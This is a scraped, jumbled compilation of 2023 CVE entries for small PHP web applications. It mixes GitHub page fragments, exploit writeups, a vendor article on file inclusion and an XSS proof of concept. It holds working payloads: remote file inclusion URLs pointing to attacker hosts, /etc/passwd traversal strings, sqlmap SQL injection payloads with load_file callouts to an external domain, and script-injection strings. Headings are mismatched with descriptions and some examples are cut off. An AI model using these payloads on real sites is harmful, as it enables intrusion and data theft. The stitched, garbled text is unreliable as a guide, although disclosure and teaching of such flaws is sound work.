A vulnerability has been found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file signup.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225913 was assigned to this vulnerability.

Permalink

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

E1CHO Add files via upload

Latest commit ff8a393 Apr 14, 2023

**History**

**1** contributor

**Users who have contributed to this file**

153 KB

Download

*   Open with Desktop
*   Download
*   Delete file

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2023-2035: cve_hub/Video Sharing Website vuln 3.pdf at main · E1CHO/cve_hub

A vulnerability was found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file upload.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225914 is the identifier assigned to this vulnerability.

CVE-2023-2036

Online Pizza Ordering v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

CVE-2023-29627: File uploads | Web Security Academy

Purchase Order Management v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

In this article we will cover:

*   What are File Inclusion Vulnerabilities?
*   Types of file inclusion vulnerabilities
    *   Local File Inclusion (LFI)
        *   Local File Inclusion (LFI) Example
    *   Remote File Inclusion (RFI)
        *   Remote File Inclusion (RFI) Example
        *   RFI prevention and mitigation
*   File inclusion vulnerabilities in common programming languages with examples
    *   File inclusion in PHP
        *   Example of an file Inclusion vulnerability in PHP
    *   JavaServer Pages (JSP)
        *   Example of an File Inclusion vulnerability in JSP
    *   Server Side Includes (SSI)
        *   Example of an File Include vulnerability in SSI
*   How can Bright help prevent File Inclusion vulnerabilities?

**What are File Inclusion Vulnerabilities?**

File Inclusion vulnerabilities often affect web applications that rely on a scripting run time, and occur when a web application allows users to submit input into files or upload files to the server. They are often found in poorly-written applications.

File Inclusion vulnerabilities allow an attacker to read and sometimes execute files on the victim server or, as is the case with Remote File Inclusion, to execute code hosted on the attacker’s machine.

An attacker may use remote code execution to create a web shell on the server, and use that web shell for website defacement.

**Types of file inclusion vulnerabilities**

File inclusion vulnerabilities come in two types, depending on the origin of the included file:

– Local File Inclusion (LFI)  
– Remote File Inclusion (RFI)

**Local File Inclusion (LFI)**

A Local File Inclusion attack is used to trick the application into exposing or running files on the server. They allow attackers to execute arbitrary commands or, if the server is misconfigured and running with high privileges, to gain access to sensitive data.

These attacks typically occur when an application uses the path to a file as input. If the application treats that input as trusted, an attacker can use the local file in an include statement.

While Local File Inclusion and Remote File Inclusion are very similar, an attacker using LFI may include only local files.

**Local File Inclusion (LFI) Example**

/**  
* Get the filename from a GET input  
* Example - http://example-website.com/?file=filename.php  
*/  
$file = $_GET[‘file’];

/**  
* Unsafely include the file  
* Example - filename.php  
*/  
include(‘directory/’ . $file);

In the example above the attacker’s intent is to trick the application into executing a PHP script, such as a web shell

http://example-website.com/?file=../../uploads/malicious.php

Once a user runs the web application, the file uploaded by the attacker will be included and executed. This will allow the attacker to run any server-side code that he wants.

Learn more about local file inclusion attack – https://brightsec.com/blog/local-file-inclusion-lfi/

**Remote File Inclusion (RFI)**

An attacker who uses Remote File Inclusion targets web applications that dynamically reference external scripts. The goal of the attacker is to exploit the referencing function in the target application and to upload malware from a remote URL, located on a different domain.

The results of a successful RFI attack can be information theft, a compromised server and a site takeover, resulting in content modification.

**Remote File Inclusion (RFI) Example**

This example illustrates how Remote File Inclusion attacks work:

1.  A JavaServer Pages page containing the following code:

<jps:include page=”<%=(String)request.getParameter(“ParamName”)%>”> 

can be manipulated with the following request: 

Page1.jsp?ParamName=/WEB-INF/DB/password.

After the application processes the request, it will reveal the content of the password file.

2.  The application has an import statement that requests content from a URL address: 

<c:import url=”<*request.getParameter(“conf”)%>”>.

The same input statement can be used for malware injection if the statement is unsanitized.

For example: 

Page2.jsp?conf=https://evil-website.com/attack.js

3.  An attacker will often launch a Remote File Inclusion attack by manipulating the request parameters so that they refer to a remote, malicious file.

For example, consider the following code:

$incfile = $_REQUEST[“file”];  
include($incfile.”.php”);

1.  $incfile = $_REQUEST[“file”]; – extracts the file parameter value from the HTTP request.

2.  include($incfile.”.php”); – uses that value to dynamically set the file name.

If you don’t have proper sanitization in place, this code can be exploited, resulting in unauthorized file uploads.

For example, this URL string:

http://www.example-website.com/vulnerable_page.php?file=http://www.attacker.com/backdoor

contains an external reference to a backdoor file stored in a remote location (http://www.attacker.com/backdoor\_shell.php.)

Once uploaded to the application, this uploaded backdoor can be later used to hijack the server or gain access to the application database.

**RFI prevention and mitigation**

To minimize the risk of RFI attacks, proper input validation and sanitization has to be implemented. Ensure you don’t fall victim of the misconception that all user inputs can be fully sanitized. Look at sanitization only as an additive to a dedicated security solution.

Sanitize the user supplied or controlled input the best you can including:

*   HTTP header values
*   URL parameters
*   Cookie values
*   GET/POST parameters

Check the input fields against a whitelist. An attacker can supply input in a different format (encoded or hexadecimal formats) and bypass a blacklist.

Client-side validation comes with the benefit of reduced processing overhead, but they are vulnerable to attacks by proxy tools, so apply the validation on the server end.

Make sure you restrict execution permissions for the upload directories, maintain a whitelist of acceptable files types, and restrict upload file sizes.

**File inclusion vulnerabilities in common programming languages with examples****File inclusion in PHP**

The main cause of File Inclusion vulnerabilities in PHP, is the use of unvalidated user-input with a filesystem function that includes a file for execution – most notable being the include and require statements. In PHP 5.x the allow\_url\_include directive is disabled by default, but be cautious with applications written in older PHP versions, because before 5.x allow\_url\_include was enabled by default.

The goal of the attacker is to alter a variable that is passed to one of these functions, to cause it to include malicious code from a remote resource.

To mitigate the risk of File Inclusion vulnerabilities in PHP, make sure all user input is validated before it’s being used by the application.

**Example of an file Inclusion vulnerability in PHP**

<?php  
If (isset($_GET[‘language’])) {  
     include($_GET[‘language’] . ‘.php’);  
}  
?>

<form method=”get”>  
          <select name=”language”>  
                   <option value=”english”>English</option>  
                   <option value=”french”>French</option>  
                   …  
          </select>  
          <input type=”submit”>  
</form>

The developer intended to read in english.php or french.php, which will alter the application’s behavior to display the language of the user’s choice. But it is possible to inject another path using the language parameter. 

For example:

*   /vulnerable.php?language=http://evil.example.com/webshell.txt? – injects a remotely hosted file containing a malicious code (remote file include)
*   /vulnerable.php?language=C:\\ftp\\upload\\exploit – Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
*   /vulnerable.php?language=C:\\notes.txt%00 – example using NULL meta character to remove the .php suffix, allowing access to files other than .php. Note, this use of null byte injection was patched in PHP 5.3, and can no longer be used for LFI/RFI attacks.
*   /vulnerable.php?language=../../../../../etc/passwd%00 – allows an attacker to read the contents of the etc/passwd file on a Unix-like system through a directory traversal attack.
*   /vulnerable.php?language=../../../../../proc/self/environ%00 – allows an attacker to read the contents of the /proc/self/environ file on a Unix-like system through a directory traversal attack. An attacker can modify a HTTP header (such as User-Agent) in this attack to be PHP code to exploit remote code execution.

The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation, such as a whitelist, cannot be used, then rely upon input filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined Switch/Case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path.

**JavaServer Pages (JSP)**

JavaServer Pages (JPS) is a scripting language which can include files for execution at runtime.

**Example of an File Inclusion vulnerability in JSP**

<%  
String p = request.getParameter(“p”);  
@include file=”<%=”includes/” + p +”.jsp”%>”  
%>

*   /vulnerable.jps?p=../../../../var/log/access.log%00 – Unlike PHP, JSP is still affected by Null byte injection, and this param will execute JSP commands found in the web server’s access log.

**Server Side Includes (SSI)**

Although a Server Side Include is uncommon and not typically enabled on a default web server, it can be used to gain remote code execution on a vulnerable web server.

**Example of an File Include vulnerability in SSI**

The following code is vulnerable to a remote-file inclusion vulnerability:

<!DOCTYPE html>  
<html>  
<head>  
<title>Test file</title>  
<head>  
<body>  
  
</body>  
</html>

The above code is not an XSS vulnerability, but rather including a new file to be executed by the server.

**How can Bright help prevent File Inclusion vulnerabilities?**

As mentioned, input sanitization and proper file management practices are almost never sufficient on their own, even if they effectively minimize the risk of File Inclusion. This is important, as many attacks succeed as a result of a false sense of security, which is encouraged by DIY practices. 

Bright can scan your web applications to detect File Inclusion vulnerabilities. 

**Build Secure Applications. FAST**

Whether as a standalone scanner to test your production ready web applications or seamlessly integrated into your CI/CD pipelines, developer friendly remediation guidelines are provided, with all the relevant information you need to understand the issue and fix it, with no false positives. 

In terms of reporting, a diff-like view is provided, highlighting what the engine did to exploit the vulnerability, like in the Local File Inclusion below:

https://example-site/bar/file=content.ini..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Bright indicates the original part in red, with the green part representing what was added by the tool.

You can start testing for File Inclusion vulnerabilities today with Bright. Get a free account here – https://app.brightsec.com/signup

CVE-2023-29621: File Inclusion Vulnerabilities: What are they and how do they work?

Employee Performance Evaluation System v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Vendor**

**Description:**

The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen.

STATUS: CRITICAL Vulnerability

\[+\]Get Info:

<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

\[+\]Exploit:

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old\_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ; 
  
// New Name For The File
$new\_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ; 
  
// using rename() function to rename the file
rename( $old\_name, $new\_name) ;
  
?>

**RCE using curl protocol**

**Reproduce:**

href

**Proof and Exploit:**

href

**Reference:**

href

**Time spend:**

00:17:00

CVE-2023-29625: CVE-nu11secur1ty/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.

The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application's response.

    POST /purchase_order/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost/purchase_order/admin/login.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 37
    
    username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g

CVE-2023-29623: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty

Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.

The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvik.stupid.com\\aej'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

\--\-
Parameter: password (POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause
    Payload: username\=pwKLHXbY&password\=\-4290') OR 6172=6172 AND ('XovE'\='XovE

    Type: error\-based
    Title: MySQL \>= 5.0 OR error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username\=pwKLHXbY&password\=j3X!k3l!R0'+(select load\_file('\\\\\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\\\aej'))+'') OR (SELECT 8766 FROM(SELECT COUNT(\*),CONCAT(0x717a6a6b71,(SELECT (ELT(8766=8766,1))),0x7162767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND ('dncG'\='dncG

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: username\=pwKLHXbY&password\=j3X!k3l!R0'+(select load\_file('\\\\\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\\\aej'))+'') AND (SELECT 7405 FROM (SELECT(SLEEP(3)))pVNf) AND ('fltf'\='fltf
\--\-

CVE-2023-29622: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

Yoga Class Registration System 1.0 was discovered to contain a SQL injection vulnerability via the cid parameter at /admin/login.php.

The cid parameter appears to be vulnerable to Multiple-SQL injection attacks. The payload '+(select load\_file('\\\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\\shs'))+' was submitted in the cid parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker easily can steal all information about this server and this could be awful for all users of this system.

\--\-
Parameter: cid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND 7469=7469 AND 'IrlM'\='IrlM

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 6894 FROM(SELECT COUNT(\*),CONCAT(0x71786b7071,(SELECT (ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'\='CykB

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'\='KLgd
\--\-

CVE-2023-29626: CVE-nu11secur1ty/vendors/oretnom23/2023/Yoga-Class-Registration -1.0-2023 - Multiple-SQLi at main · nu11secur1ty/CVE-nu11secur1ty

Atropim 1.5.26 is vulnerable to Directory Traversal.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal****Vendor**

**Description:**

The Create Import Feed option with glyphicon-glyphicon-paperclip - format CSV upload function appears to be vulnerable to User interaction - Unauthenticated File upload - RCE attacks. The attacker can easily upload a malicious file then can execute the file remotely and can get VERY sensitive information about the configuration of this system, after this he can perform a very nasty attack.

STATUS: HIGH Vulnerability CRITICAL

\[+\]Exploit:

<?php
// by nu11secur1ty - 2023
$dir = "/var/www/";
$ascending\_order = scandir($dir);
$descending\_order = scandir($dir,1);

print\_r($ascending\_order);
print\_r($descending\_order);
?>

**Reproduce:**

href

**Reference:**

href

**Reference:**

href

**Proof and Exploit:**

href

**Time spend:**

00:15:00

CVE-2023-26969: CVE-nu11secur1ty/vendors/atrocore/atrocore-1.5.26 at main · nu11secur1ty/CVE-nu11secur1ty

** UNSUPPORTED WHEN ASSIGNED ** The Export User plugin through 2.0 for MyBB allows XSS during the process of an admin generating DSGVO data for a user, via the Custom User Title, Location, or Bio field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

    # Exploit Title: MyBB Export User Plugin 2.0 – Cross-Site Scripting# Date: January 29, 2021# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1408# Version: 2.0# Tested On: Windows 10# CVE: CVE-2023-27890Description:This plugin allows users to request their data to export. XSS occurs when admin is generating data for user.Proof of Concept:– As a regular user go to User CP -> Edit Profile– Add a payload in Custom User Title, Location, or Bio <script>alert(1)</script>– Request your data via User CP -> DSGVO data request– Login as admin you will be notified a user wants their data– When generating the users data their payload will execute

Tag

#php